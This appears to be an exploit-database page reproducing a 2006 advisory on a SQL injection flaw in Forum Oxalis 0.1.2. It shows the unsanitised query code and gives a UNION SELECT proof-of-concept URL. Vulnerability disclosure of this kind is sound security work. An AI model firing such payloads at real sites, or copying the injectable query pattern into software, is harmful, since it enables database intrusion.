header-logo
Suggest Exploit
vendor:
Forum Oxalis
by:
Jean Pascal Pereira
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Forum Oxalis
Affected Version From: 0.1.2
Affected Version To: 0.1.2
Patch Exists: NO
Related CWE: N/A
CPE: Forum_Oxalis
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Forum Oxalis 0.1.2 <= SQL Injection Vulnerability

The application is prone to a remote SQL injection vulnerability. An attacker can exploit this issue by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Do some input validation.
Source

Exploit-DB raw data:

#################################################
Forum Oxalis 0.1.2 <= SQL Injection Vulnerability
#################################################

Discovered by: Jean Pascal Pereira <pereira@secbiz.de>

Vendor information:

"Forum Oxalis is a minimalis GPL PHP forum using CSS."

Vendor URI: http://developer.berlios.de/projects/forumoxalis/

#################################################

Risk-level: High

The application is prone to a remote SQL injection vulnerability.

-------------------------------------

func.php, line 72:

function lister_messages($id, $page, $parpage)

{
    global $mysql_table;

    $resu = mysql_query("select * from `$mysql_table` where id=$id");

    $nombre_messages = mysql_num_rows($resu);

forum.php, line 7:

$id = $_GET['id'];

forum.php, line 74:

case "message":

    lister_messages($id, $page, $reponses_par_page);

    $reponse_a_id = $id;

    break;

-------------------------------------

Exploit / Proof Of Concept:

http://localhost/ForumOxalis/index.php?id=99999/**/UNION/**/SELECT/**/0x00,version(),0x00,0x00,0x00,0x00,0x00,0x00,0x00&action=message

-------------------------------------

Solution:

Do some input validation. 

-------------------------------------

#################################################

Navigation

Suggest Exploit

Services By CQR